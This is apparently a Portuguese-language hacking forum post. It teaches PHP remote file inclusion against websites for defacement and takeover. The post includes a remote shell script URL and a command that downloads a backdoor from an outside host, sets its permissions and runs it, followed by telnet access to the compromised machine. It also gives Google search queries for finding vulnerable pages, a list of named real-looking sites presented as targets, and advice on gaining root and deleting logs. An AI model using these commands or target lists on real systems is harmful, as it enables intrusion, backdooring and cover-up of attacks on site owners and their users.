Bom, muita gente tem duvidas sobre PHP Injection, provavelmente a vulnerabilidade mais comum entre defacers/owners.
A vulnerabilidade acontece por desconhecimento do webmaster, ou por distração, eles colocam 'includes' para ajudar na criação do seu site sem fazer nenhuma verificação das 'strings'
Um exemplo de um site vulneravel, com 3 partes em uma tabela:

include('topo.php');
include('menu.php');
include($page);

Existem várias strings, a mais comum é page..
Então um endereço ficticio: http://www.alvo.com.br/index.php?page=novidades.php
Neste exemplo ele carregaria a página novidades.php do site.. Se ela for vulneravel dá para 'injetar' páginas maliciosas que executam comandos na maquina que roda o site (por isso o nome PHP Injection)

Estarei usando esse script como referencia (chamado de cmd):

http://kmzrox.by.ru/cmd.gif?&cmd=ls
Obviamente você tentaria: http://www.alvo.com.br/index.php?page=h ... if?&cmd=ls
Ops! Se a página for vulneravel ela vai carregar! Se ela funcionar e não estiver em safe mode (uma opção do php.ini) vai listar os arquivos do site (comando ls).
Não é só isso, a partir daqui você usa a sua criatividade, rodar backdoor para ter acesso remoto (por telnet/putty), pacotar pessoas e servers, configurar psybnc, etc.. Só precisará saber alguns comandos de Linux/FreeBSD/SunOS..

Backdoor: kmzrox.by.ru/r0nin
Para usar coloque no 'cmd' cd /tmp;wget kmzrox.by.ru/r0nin;chmod 777 r0nin;./r0nin
entra na pasta tmp, baixa a backdoor (exploit), coloca permissão para o arquivo e roda ele
Por exemplo: http://www.alvo.com.br/index.php?page=h ... in;./r0nin

Se tudo ocorrer bem e não tiver firewall agora vá iniciar > executar > telnet http://www.alvo.com.br 1666, pronto, você está na maquina, enjoy! :~)

Para procurar no google as páginas separei uma lista de chaves, lembrando que você pode usar inurl:".pt" (escolhendo a classe do dominio) para procurar páginas somente de um país.

allinurl:".php?page="
allinurl:".php?inc="
allinurl:".php?body="
allinurl:".php?main="
allinurl:".php?pag="
allinurl:".php?p="
allinurl:".php?content="
allinurl:".php?cont="
allinurl:".php?c="
allinurl:".php?meio="
allinurl:".php?x="
allinurl:".php?cat="
allinurl:".php?site="
allinurl:".php?m="
allinurl:".php?do="
allinurl:".php?x="
allinurl:".php?content="
allinurl:".php?pagina="
allinurl:".php?root="
allinurl:".php?include="
allinurl:".php?open="
allinurl:".php?visualizar="
allinurl:".php?conf="

Achará varios sites, a maioria no padrão:

http://www.interreg3c.net/sixcms/list.php?page=home_en
http://www.ourdocuments.gov/content.php?page=milestone
http://www.safer-networking.org/index.php?page=mirrors
http://www.serviceandinclusion.org/inde ... e=nat_conf

Agora é simples, você tem os sites pra procurar e uma cmd, agora é só ir de página em página substituindo os valores da string page para o cmd que vai usar :}
Você pode utilizar exploits para tentar conseguir root (super user) na máquina, assim ter permissão para fazer TUDO com os sites que estão dentro dela, apagar todos os logs, etc.
Aqui vai uma lista de páginas vulneraveis (depois de ler isso vocês já saberão o que fazer), a maioria está protegida ou com firewall, é só para mostrar o que vai acontecer quando uma página é vulneravel :~)

http://www.imobmarques.com.br/pagina.php?pagina=
http://www.effectingchange.luton.ac.uk/ ... p?content=
http://www.tourtrans.ru/index.php?page=
http://www.iobchody.unas.cz/index.php?page=
http://www.balustrady.cz/index.php?page=
http://www.kubela.iglu.cz/index.php?inc=
http://www.engelking-elektronik.de/index.php?main=valor
http://www.mob.hu/cgi-bin/index.php?main=valor
http://www.medianlg.hu/index.php?site=
http://www.spillo.it/home.php?main=
http://www.fdf-k22.dk/index.php?main=
http://www.astro.up.pt/investigacao/con ... .php?page=
http://www.nyinvestmentproperties.com/index.php?main=
http://www.timetoupgrade.us/index.php?main=
http://www.msgames.msu.ac.th/reading.php?page=
http://www.mobilink.com.tr/index.php?page=
http://www.slh.org.tw/tw/index.php?page=
http://www.climb.idv.tw/index.php?page=
http://www.azsrc.com/index.php?page=

Páginas com passthru() bloqueados, quando não aparece nada na box são ignorados, pode continuar procurando :B
Estou só compartilhando meus conhecimentos, se alguem tiver alguma coisa para complementar :}


(LINKS EDITADOS, AGORA TODAS AS EXPLOITS ESTÃO NO AR)



Cmd's on, aproveitem:
http://www.room-escape-games.com/